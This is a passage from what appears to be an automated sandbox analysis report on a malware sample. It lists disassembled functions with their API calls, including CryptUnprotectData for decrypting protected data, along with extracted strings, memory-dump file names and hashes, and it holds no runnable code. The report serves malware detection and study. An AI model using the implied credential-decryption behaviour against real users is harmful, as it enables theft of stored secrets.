                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ONyo$a)?$~'{{
                            • API String ID: 0-3897584696
                            • Opcode ID: 4f61ee8c31d84c5ed6cdc42bc462eb2778eca3e79167c2084585704900d6c97a
                            • Instruction ID: 47d3e0a2ddc4343ca523d302890f1364aeabde2e17f358553d964a7160ac65c5
                            • Opcode Fuzzy Hash: 4f61ee8c31d84c5ed6cdc42bc462eb2778eca3e79167c2084585704900d6c97a
                            • Instruction Fuzzy Hash: C1B2E3F360C200AFE704AE2DEC8567AFBE9EF94720F16492DE6C5C7744E63598018697
                            Function 00C918F0 Relevance: 5.0, Strings: 3, Instructions: 1221COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: =2[u$aphj$c{?
                            • API String ID: 0-2987279715
                            • Opcode ID: 7ba3fb5242d9e6f2380ad4d18cdae1a1d7cc0c089540239728dbe01b4a0c6975
                            • Instruction ID: 776de50478f643048b4e9753a906a8027c1c61b2a518a2c039f340858c406ea1
                            • Opcode Fuzzy Hash: 7ba3fb5242d9e6f2380ad4d18cdae1a1d7cc0c089540239728dbe01b4a0c6975
                            • Instruction Fuzzy Hash: 9E82D6F360C6049FE3046E19EC8567AB7E9EF94320F1A863DEAC4C3744EA3558458797
                            Function 00904040 Relevance: 4.6, APIs: 3, Instructions: 124stringtimeCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00904075
                            • lstrcpy.KERNEL32(00000000,012FED98), ref: 0090409F
                            • GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,008E134E,?,0000001A), ref: 009040A9
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$SystemTime
                            • String ID:
                            • API String ID: 684065273-0
                            • Opcode ID: 8a89c2a5db2e067adc1a3ff035a4012f51c414cc6ae5e51183245181b66e9252
                            • Instruction ID: a88460de3be5f4adaccc8b8702860906acf820e5c9a7c578ef292cd3b6b3b0e2
                            • Opcode Fuzzy Hash: 8a89c2a5db2e067adc1a3ff035a4012f51c414cc6ae5e51183245181b66e9252
                            • Instruction Fuzzy Hash: 2041A6B1A15246AFDB14CF25C8846667BF8FF59314F0980ADD955EB391C771DC82CB40
                            Function 008FCCD0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(0090B118,00000000,00000001,0090B108,?), ref: 008FCCF6
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 008FCD36
                            • lstrcpyn.KERNEL32(?,?,00000104), ref: 008FCDB9
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                            • String ID:
                            • API String ID: 1940255200-0
                            • Opcode ID: a352f583dfa6e9d88f32112f6fce45337085bc8651dca6c04a394362f566b9ee
                            • Instruction ID: a5961373a352e7be1b150d4080ad80e1b01f2d57d6a49560ee69d5be0cdcea04
                            • Opcode Fuzzy Hash: a352f583dfa6e9d88f32112f6fce45337085bc8651dca6c04a394362f566b9ee
                            • Instruction Fuzzy Hash: 1A314471A40619AFD710DB94CC91FEDB7B9EB88B14F104194FA14EB2D0DBB0AE45CB90
                            Function 008E9B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008E9B9F
                            • LocalAlloc.KERNEL32(00000040,?), ref: 008E9BB3
                            • LocalFree.KERNEL32(?), ref: 008E9BD7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: cc5cfab24ccddb0902c742e555aba7216eee37c1c8241743e33b61413a036105
                            • Instruction ID: 6a8fe23e0085a86144ab7661d857853a210282c0a703d873f652d5efb9c8ebf9
                            • Opcode Fuzzy Hash: cc5cfab24ccddb0902c742e555aba7216eee37c1c8241743e33b61413a036105
                            • Instruction Fuzzy Hash: BE011DB5A41219BBE710DBA4DC55FABB77CEB84B00F104554EE04EB280DBB09A008BE1
                            Function 00CA5DC1 Relevance: 3.6, Strings: 2, Instructions: 1092COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Ucr;$>w}
                            • API String ID: 0-2669432049
                            • Opcode ID: 012104f75ad670329cb0fb956127518fecc5f3fb5717669c47b8c3bca660d6f4
                            • Instruction ID: dd3fd23f6a38b11ba1c91e445f7f6b307940f7bcc7ac48d46c44587994f3dc16
                            • Opcode Fuzzy Hash: 012104f75ad670329cb0fb956127518fecc5f3fb5717669c47b8c3bca660d6f4
                            • Instruction Fuzzy Hash: D57208F3A082009FE3046E2DEC8577AB7E9EF94720F1A493DEAC4C7740E67598158697
                            Function 00CA20FA Relevance: 2.9, Strings: 1, Instructions: 1647COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 9c*`
                            • API String ID: 0-3291459646
                            • Opcode ID: 0b5c07a83fb7b4c8c9567c605beeb0c2fb7d2964ba78a36cd00083ec70a32b9a
                            • Instruction ID: ffed5750b888a9815eb9f4c829ca4e7888d5259cd4d700b2ffdf3106b5605b95
                            • Opcode Fuzzy Hash: 0b5c07a83fb7b4c8c9567c605beeb0c2fb7d2964ba78a36cd00083ec70a32b9a
                            • Instruction Fuzzy Hash: 81B2F7F360C2049FE304AE2DEC8567AFBE9EF94720F16493DEAC4C7744EA3558058696
                            Function 00BEC2C9 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: }
                            • API String ID: 0-917470332
                            • Opcode ID: 772b1595cb862e75fbe318e1d03cbf7b7ccbc93e8883c2807da9db34b0c6f593
                            • Instruction ID: e5b3613c6fe42fefd29740c3568ce6c92e99e3d7ffc377aef00df4e060639cf2
                            • Opcode Fuzzy Hash: 772b1595cb862e75fbe318e1d03cbf7b7ccbc93e8883c2807da9db34b0c6f593
                            • Instruction Fuzzy Hash: 534159F36191004BE318AA39DD567BBBBD6DFC4320F16C22ED6C593788EC3854018282
                            Function 00B894CE Relevance: .3, Instructions: 252COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: de55f1e1cc80b7bd29f81f164d299318af905ee0417f842ee2531c063450e1da
                            • Instruction ID: abc4cd0c2bf1b84b90e2af3391e8afd2124b5fb6e047bfe81d14a4bf2a40e5d6
                            • Opcode Fuzzy Hash: de55f1e1cc80b7bd29f81f164d299318af905ee0417f842ee2531c063450e1da
                            • Instruction Fuzzy Hash: 1571E9F3A0C6005FF704AE29EC8576AB7E6EBD4320F1B853DDBC493B44E93958058696
                            Function 00B3FF73 Relevance: .1, Instructions: 149COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5e9289b2197a429dc73b91c07279c26c48a897bc3a3cfe4bc562c00b0568759f
                            • Instruction ID: e87455addd86cf00be20ff6f1bbc3b3cc9f9f617813107ea452592e3132d5739
                            • Opcode Fuzzy Hash: 5e9289b2197a429dc73b91c07279c26c48a897bc3a3cfe4bc562c00b0568759f
                            • Instruction Fuzzy Hash: D24167F3E053184BF3405E29DC8432AB6D6EBD0B21F2B423DDAD897781E93D5D058286
                            Function 00C40AE5 Relevance: .1, Instructions: 139COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6769d2428fbd728ebe42e8d7ae691c8971b1184a30d7a8a46b4aaaa677cd6ee4
                            • Instruction ID: 6b18830c68a008cc880b3663cdf0df980a37673fa66ce9b037ebd6c242f12a4b
                            • Opcode Fuzzy Hash: 6769d2428fbd728ebe42e8d7ae691c8971b1184a30d7a8a46b4aaaa677cd6ee4
                            • Instruction Fuzzy Hash: 3641E8B3A086109FE318AE69DC907BAF7D6EB84320F17853DE7C8C7740E5795C018696
                            Function 00BB0871 Relevance: .1, Instructions: 71COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
